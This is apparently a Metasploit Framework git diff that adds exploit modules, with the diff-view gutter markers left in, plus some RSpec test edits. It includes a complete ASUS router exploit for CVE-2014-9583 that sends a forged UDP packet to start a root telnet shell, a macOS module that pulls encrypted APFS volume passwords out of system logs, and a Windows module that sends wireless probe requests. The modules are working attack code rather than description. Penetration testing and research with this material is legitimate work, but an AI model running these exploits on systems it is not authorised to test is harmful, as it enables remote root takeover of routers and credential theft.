This module exploits an authentication bypass vulnerability in the
|
||||||
|
infosvr service running on UDP port 9999 on various ASUS routers to
|
||||||
|
execute arbitrary commands as root.
|
||||||
|
|
||||||
|
This module launches the BusyBox Telnet daemon on the port specified
|
||||||
|
in the TelnetPort option to gain an interactive remote shell.
|
||||||
|
|
||||||
|
This module was tested successfully on an ASUS RT-N12E with firmware
|
||||||
|
version 2.0.0.35.
|
||||||
|
|
||||||
|
Numerous ASUS models are reportedly affected, but untested.
|
||||||
|
},
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'Friedrich Postelstorfer', # Initial public disclosure and Python exploit
|
||||||
|
'jduck', # Independent discovery and C exploit
|
||||||
|
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
|
||||||
|
],
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'unix',
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['CVE', '2014-9583'],
|
||||||
|
['EDB', '35688'],
|
||||||
|
['URL', 'https://github.com/jduck/asus-cmd']
|
||||||
|
],
|
||||||
|
'DisclosureDate' => 'Jan 4 2015',
|
||||||
|
'Privileged' => true,
|
||||||
|
'Arch' => ARCH_CMD,
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'Compat' => {
|
||||||
|
'PayloadType' => 'cmd_interact',
|
||||||
|
'ConnectionType' => 'find'
|
||||||
|
}
|
||||||
|
},
|
||||||
|
'Targets' => [['Automatic', {}]],
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
register_options [
|
||||||
|
Opt::RPORT(9999),
|
||||||
|
OptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]),
|
||||||
|
OptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]),
|
||||||
|
OptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25])
|
||||||
|
]
|
||||||
|
register_advanced_options [
|
||||||
|
# If the session is killed (CTRL+C) rather than exiting cleanly,
|
||||||
|
# the telnet port remains open, but is unresponsive, and prevents
|
||||||
|
# re-exploitation until the device is rebooted.
|
||||||
|
OptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit'])
|
||||||
|
]
|
||||||
|
end
|
||||||
|
|
||||||
|
def telnet_timeout
|
||||||
|
(datastore['TelnetTimeout'] || 10)
|
||||||
|
end
|
||||||
|
|
||||||
|
def telnet_port
|
||||||
|
datastore['TelnetPort']
|
||||||
|
end
|
||||||
|
|
||||||
|
def request(cmd)
|
||||||
|
pkt = ''
|
||||||
|
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
|
||||||
|
pkt << "\x0C"
|
||||||
|
# PacketType [byte] ; NET_PACKET_TYPE_CMD
|
||||||
|
pkt << "\x15"
|
||||||
|
# OpCode [word] ; NET_CMD_ID_MANU_CMD
|
||||||
|
pkt << "\x33\x00"
|
||||||
|
# Info [dword] ; Comment: "Or Transaction ID"
|
||||||
|
pkt << Rex::Text.rand_text_alphanumeric(4)
|
||||||
|
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
|
||||||
|
pkt << Rex::Text.rand_text_alphanumeric(6)
|
||||||
|
# Password [byte[32]] ; Not checked at all
|
||||||
|
pkt << "\x00" * 32
|
||||||
|
# Command Length + \x00 + Command padded to 512 bytes
|
||||||
|
pkt << ([cmd.length].pack('C') + "\x00" + cmd).ljust((512 - pkt.length), "\x00")
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
connect_udp
|
||||||
|
print_status "#{rhost} - Starting telnetd on port #{telnet_port}..."
|
||||||
|
udp_sock.put request "telnetd -l /bin/sh -p #{telnet_port}"
|
||||||
|
disconnect_udp
|
||||||
|
|
||||||
|
vprint_status "#{rhost} - Waiting for telnet service to start on port #{telnet_port}..."
|
||||||
|
Rex.sleep 3
|
||||||
|
|
||||||
|
vprint_status "#{rhost} - Connecting to #{rhost}:#{telnet_port}..."
|
||||||
|
|
||||||
|
sock = Rex::Socket.create_tcp 'PeerHost' => rhost,
|
||||||
|
'PeerPort' => telnet_port,
|
||||||
|
'Context' => { 'Msf' => framework, 'MsfExploit' => self },
|
||||||
|
'Timeout' => telnet_timeout
|
||||||
|
|
||||||
|
if sock.nil?
|
||||||
|
fail_with Failure::Unreachable, "Telnet service unreachable on port #{telnet_port}"
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_status "#{rhost} - Trying to establish a telnet session..."
|
||||||
|
|
||||||
|
prompt = negotiate_telnet sock
|
||||||
|
if prompt.nil?
|
||||||
|
sock.close
|
||||||
|
fail_with Failure::Unknown, 'Unable to establish a telnet session'
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good "#{rhost} - Telnet session successfully established..."
|
||||||
|
|
||||||
|
handler sock
|
||||||
|
end
|
||||||
|
|
||||||
|
def negotiate_telnet(sock)
|
||||||
|
prompt = '#'
|
||||||
|
Timeout.timeout(datastore['TelnetBannerTimeout']) do
|
||||||
|
while true
|
||||||
|
data = sock.get_once(-1, telnet_timeout)
|
||||||
|
if !data or data.length == 0
|
||||||
|
return nil
|
||||||
|
elsif data.include? prompt
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Timeout::Error
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,71 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'Mac OS X APFS Encrypted Volume Password Disclosure',
|
||||||
|
'Description' => %q(
|
||||||
|
This module exploits a flaw in OSX 10.13 through 10.13.3
|
||||||
|
that discloses the passwords of encrypted APFS volumes.
|
||||||
|
|
||||||
|
In OSX a normal user can use the 'log' command to view the system
|
||||||
|
logs. In OSX 10.13 to 10.13.2 when a user creates an encrypted APFS
|
||||||
|
volume the password is visible in plaintext within these logs.
|
||||||
|
),
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
[ 'URL', 'https://thehackernews.com/2018/03/macos-apfs-password.html' ],
|
||||||
|
[ 'URL', 'https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp' ]
|
||||||
|
],
|
||||||
|
'Platform' => 'osx',
|
||||||
|
'Arch' => ARCH_ALL,
|
||||||
|
'Author' => [
|
||||||
|
'Sarah Edwards', # earliest public discovery
|
||||||
|
'cbrnrd' # Metasploit module
|
||||||
|
],
|
||||||
|
'SessionTypes' => [ 'shell', 'meterpreter' ],
|
||||||
|
'Targets' => [
|
||||||
|
[ 'Mac OS X High Sierra (10.13.1, 10.13.2, 10.13.3)', { } ]
|
||||||
|
],
|
||||||
|
'DefaultTarget' => 0,
|
||||||
|
'DisclosureDate' => 'Mar 21 2018'
|
||||||
|
))
|
||||||
|
register_options([
|
||||||
|
# The command doesn't give volume names, only mount paths (current or previous)
|
||||||
|
OptString.new('MOUNT_PATH', [false, 'The mount path of the volume to get the password of (Leave blank for all)', ''])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
osx_version = cmd_exec('sw_vers -productVersion')
|
||||||
|
return Exploit::CheckCode::Vulnerable if osx_version =~ /^10\.13[\.[0-3]]?$/
|
||||||
|
Exploit::CheckCode::Safe
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
if check == Exploit::CheckCode::Safe
|
||||||
|
print_error "This version of OSX is not vulnerable"
|
||||||
|
return
|
||||||
|
end
|
||||||
|
cmd = "log show --info --predicate 'eventMessage contains \"newfs_\"'"
|
||||||
|
cmd << " | grep #{datastore['MOUNT_PATH']}" unless datastore['MOUNT_PATH'].empty?
|
||||||
|
vprint_status "Running \"#{cmd}\" on target..."
|
||||||
|
results = cmd_exec(cmd)
|
||||||
|
vprint_status "Target results:\n#{results}"
|
||||||
|
if results.empty?
|
||||||
|
print_error 'Got no response from target. Stopping...'
|
||||||
|
else
|
||||||
|
successful_lines = 0
|
||||||
|
results.lines.each do |l|
|
||||||
|
next unless l =~ /newfs_apfs(.*)-S(.*)$/
|
||||||
|
print_good "APFS command found: #{$&}"
|
||||||
|
successful_lines += 1
|
||||||
|
end
|
||||||
|
print_error "No password(s) found for any volumes. Exiting..." if successful_lines.zero?
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
|
@ -0,0 +1,143 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super( update_info( info,
|
||||||
|
'Name' => 'Windows Send Probe Request Packets',
|
||||||
|
'Description' => %q{
|
||||||
|
This module send probe requests through the wlan interface.
|
||||||
|
The ESSID field will be use to set a custom message.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' => [ 'bmerinofe@gmail.com' ],
|
||||||
|
'Platform' => [ 'win' ],
|
||||||
|
'SessionTypes' => [ 'meterpreter' ]
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('SSID', [true, 'Message to be embedded in the SSID field', '']),
|
||||||
|
OptInt.new('TIMEOUT', [false, 'Timeout in seconds running probes', '30'])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
ssid = datastore['SSID']
|
||||||
|
time = datastore['TIMEOUT']
|
||||||
|
|
||||||
|
if ssid.length > 32
|
||||||
|
print_error("The SSID must be equal to or less than 32 bytes")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
mypid = client.sys.process.getpid
|
||||||
|
@host_process = client.sys.process.open(mypid, PROCESS_ALL_ACCESS)
|
||||||
|
@wlanapi = client.railgun.wlanapi
|
||||||
|
|
||||||
|
wlan_handle = open_handle()
|
||||||
|
unless wlan_handle
|
||||||
|
print_error("Couldn't open WlanAPI Handle. WLAN API may not be installed on target")
|
||||||
|
print_error("On Windows XP this could also mean the Wireless Zero Configuration Service is turned off")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
# typedef struct _DOT11_SSID {
|
||||||
|
# ULONG uSSIDLength;
|
||||||
|
# UCHAR ucSSID[DOT11_SSID_MAX_LENGTH];
|
||||||
|
# } DOT11_SSID, *PDOT11_SSID;
|
||||||
|
pDot11Ssid = [ssid.length].pack("L<") << ssid
|
||||||
|
wlan_iflist = enum_interfaces(wlan_handle)
|
||||||
|
if wlan_iflist.length == 0
|
||||||
|
print_status("Wlan interfaces not found")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
print_status("Wlan interfaces found: #{wlan_iflist.length}")
|
||||||
|
print_status("Sending probe requests for #{time} seconds")
|
||||||
|
begin
|
||||||
|
::Timeout.timeout(time) do
|
||||||
|
while true
|
||||||
|
wlan_iflist.each do |interface|
|
||||||
|
vprint_status("Interface Guid: #{interface['guid'].unpack('H*')[0]}")
|
||||||
|
vprint_status("Interface State: #{interface['state']}")
|
||||||
|
vprint_status("DOT11_SSID payload: #{pDot11Ssid.chars.map {|c| c.ord.to_s(16) }.join(':')}")
|
||||||
|
@wlanapi.WlanScan(wlan_handle,interface['guid'],pDot11Ssid,nil,nil)
|
||||||
|
sleep(10)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
rescue ::Timeout::Error
|
||||||
|
closehandle = @wlanapi.WlanCloseHandle(wlan_handle,nil)
|
||||||
|
if closehandle['return'] == 0
|
||||||
|
print_status("WlanAPI Handle closed successfully")
|
||||||
|
else
|
||||||
|
print_error("There was an error closing the Handle")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Function borrowed from @theLightCosine wlan_* modules
|
||||||
|
def open_handle
|
||||||
|
begin
|
||||||
|
wlhandle = @wlanapi.WlanOpenHandle(2,nil,4,4)
|
||||||
|
rescue
|
||||||
|
return nil
|
||||||
|
end
|
||||||
|
return wlhandle['phClientHandle']
|
||||||
|
end
|
||||||
|
|
||||||
|
# Function borrowed from @theLightCosine wlan_* modules
|
||||||
|
def enum_interfaces(wlan_handle)
|
||||||
|
|
||||||
|
iflist = @wlanapi.WlanEnumInterfaces(wlan_handle,nil,4)
|
||||||
|
pointer= iflist['ppInterfaceList']
|
||||||
|
|
||||||
|
numifs = @host_process.memory.read(pointer,4)
|
||||||
|
numifs = numifs.unpack("V")[0]
|
||||||
|
|
||||||
|
interfaces = []
|
||||||
|
|
||||||
|
#Set the pointer ahead to the first element in the array
|
||||||
|
pointer = (pointer + 8)
|
||||||
|
(1..numifs).each do |i|
|
||||||
|
interface = {}
|
||||||
|
#Read the GUID (16 bytes)
|
||||||
|
interface['guid'] = @host_process.memory.read(pointer,16)
|
||||||
|
pointer = (pointer + 16)
|
||||||
|
#Read the description(up to 512 bytes)
|
||||||
|
interface['description'] = @host_process.memory.read(pointer,512)
|
||||||
|
pointer = (pointer + 512)
|
||||||
|
#Read the state of the interface (4 bytes)
|
||||||
|
state = @host_process.memory.read(pointer,4)
|
||||||
|
pointer = (pointer + 4)
|
||||||
|
#Turn the state into human readable form
|
||||||
|
state = state.unpack("V")[0]
|
||||||
|
case state
|
||||||
|
when 0
|
||||||
|
interface['state'] = "The interface is not ready to operate."
|
||||||
|
when 1
|
||||||
|
interface['state'] = "The interface is connected to a network."
|
||||||
|
when 2
|
||||||
|
interface['state'] = "The interface is the first node in an ad hoc network. No peer has connected."
|
||||||
|
when 3
|
||||||
|
interface['state'] = "The interface is disconnecting from the current network."
|
||||||
|
when 4
|
||||||
|
interface['state'] = "The interface is not connected to any network."
|
||||||
|
when 5
|
||||||
|
interface['state'] = "The interface is attempting to associate with a network."
|
||||||
|
when 6
|
||||||
|
interface['state'] = "Auto configuration is discovering the settings for the network."
|
||||||
|
when 7
|
||||||
|
interface['state'] = "The interface is in the process of authenticating."
|
||||||
|
else
|
||||||
|
interface['state'] = "Unknown State"
|
||||||
|
end
|
||||||
|
interfaces << interface
|
||||||
|
end
|
||||||
|
return interfaces
|
||||||
|
end
|
||||||
|
end
|
|
@ -51,7 +51,6 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
|
||||||
it { is_expected.to respond_to :db_parse_db_uri_postgresql }
|
it { is_expected.to respond_to :db_parse_db_uri_postgresql }
|
||||||
it { is_expected.to respond_to :deprecated_commands }
|
it { is_expected.to respond_to :deprecated_commands }
|
||||||
it { is_expected.to respond_to :each_host_range_chunk }
|
it { is_expected.to respond_to :each_host_range_chunk }
|
||||||
it { is_expected.to respond_to :make_sortable }
|
|
||||||
it { is_expected.to respond_to :name }
|
it { is_expected.to respond_to :name }
|
||||||
it { is_expected.to respond_to :set_rhosts_from_addrs }
|
it { is_expected.to respond_to :set_rhosts_from_addrs }
|
||||||
|
|
||||||
|
@ -173,16 +172,16 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
|
||||||
" -a,--add Add a note to the list of addresses, instead of listing",
|
" -a,--add Add a note to the list of addresses, instead of listing",
|
||||||
" -d,--delete Delete the hosts instead of searching",
|
" -d,--delete Delete the hosts instead of searching",
|
||||||
" -n,--note <data> Set the data for a new note (only with -a)",
|
" -n,--note <data> Set the data for a new note (only with -a)",
|
||||||
" -t <type1,type2> Search for a list of types",
|
" -t,--type <type1,type2> Search for a list of types, or set single type for add",
|
||||||
" -h,--help Show this help information",
|
" -h,--help Show this help information",
|
||||||
" -R,--rhosts Set RHOSTS from the results of the search",
|
" -R,--rhosts Set RHOSTS from the results of the search",
|
||||||
" -S,--search Regular expression to match for search",
|
" -S,--search Search string to filter by",
|
||||||
" -o,--output Save the notes to a csv file",
|
" -o,--output Save the notes to a csv file",
|
||||||
" --sort <field1,field2> Fields to sort by (case sensitive)",
|
" -O <column> Order rows by specified column number",
|
||||||
"Examples:",
|
"Examples:",
|
||||||
" notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41",
|
" notes --add -t apps -n 'winzip' 10.1.1.34 10.1.20.41",
|
||||||
" notes -t smb.fingerprint 10.1.1.34 10.1.20.41",
|
" notes -t smb.fingerprint 10.1.1.34 10.1.20.41",
|
||||||
" notes -S 'nmap.nse.(http|rtsp)' --sort type,output"
|
" notes -S 'nmap.nse.(http|rtsp)'"
|
||||||
]
|
]
|
||||||
|
|
||||||
end
|
end
|
||||||
|
@ -341,7 +340,8 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
|
||||||
expect(@output).to match_array [
|
expect(@output).to match_array [
|
||||||
"Added workspace: foo",
|
"Added workspace: foo",
|
||||||
"Added workspace: bar",
|
"Added workspace: bar",
|
||||||
"Added workspace: baf"
|
"Added workspace: baf",
|
||||||
|
"Workspace: baf"
|
||||||
]
|
]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -349,25 +349,18 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do
|
||||||
describe "-d" do
|
describe "-d" do
|
||||||
it "should delete a workspace" do
|
it "should delete a workspace" do
|
||||||
db.cmd_workspace("-a", "foo")
|
db.cmd_workspace("-a", "foo")
|
||||||
@output = []
|
expect(framework.db.find_workspace("foo")).not_to be_nil
|
||||||
db.cmd_workspace("-d", "foo")
|
db.cmd_workspace("-d", "foo")
|
||||||
expect(@output).to match_array [
|
expect(framework.db.find_workspace("foo")).to be_nil
|
||||||
"Deleted workspace: foo",
|
|
||||||
"Switched workspace: default"
|
|
||||||
]
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
describe "-D" do
|
describe "-D" do
|
||||||
it "should delete all workspaces" do
|
it "should delete all workspaces" do
|
||||||
db.cmd_workspace("-a", "foo")
|
db.cmd_workspace("-a", "foo")
|
||||||
@output = []
|
expect(framework.db.workspaces.size).to be > 1
|
||||||
db.cmd_workspace("-D")
|
db.cmd_workspace("-D")
|
||||||
expect(@output).to match_array [
|
expect(framework.db.workspaces.size).to eq 1
|
||||||
"Deleted and recreated the default workspace",
|
|
||||||
"Deleted workspace: foo",
|
|
||||||
"Switched workspace: default"
|
|
||||||
]
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -6,5 +6,4 @@ RSpec.shared_examples_for 'Msf::DBManager::Host' do
|
||||||
it { is_expected.to respond_to :has_host? }
|
it { is_expected.to respond_to :has_host? }
|
||||||
it { is_expected.to respond_to :hosts }
|
it { is_expected.to respond_to :hosts }
|
||||||
it { is_expected.to respond_to :report_host }
|
it { is_expected.to respond_to :report_host }
|
||||||
it { is_expected.to respond_to :update_host_via_sysinfo }
|
|
||||||
end
|
end
|
|
@ -1,5 +1,4 @@
|
||||||
RSpec.shared_examples_for 'Msf::DBManager::Loot' do
|
RSpec.shared_examples_for 'Msf::DBManager::Loot' do
|
||||||
it { is_expected.to respond_to :each_loot }
|
|
||||||
it { is_expected.to respond_to :find_or_create_loot }
|
it { is_expected.to respond_to :find_or_create_loot }
|
||||||
it { is_expected.to respond_to :loots }
|
it { is_expected.to respond_to :loots }
|
||||||
it { is_expected.to respond_to :report_loot }
|
it { is_expected.to respond_to :report_loot }
|
||||||
|
|
Loading…
Reference in New Issue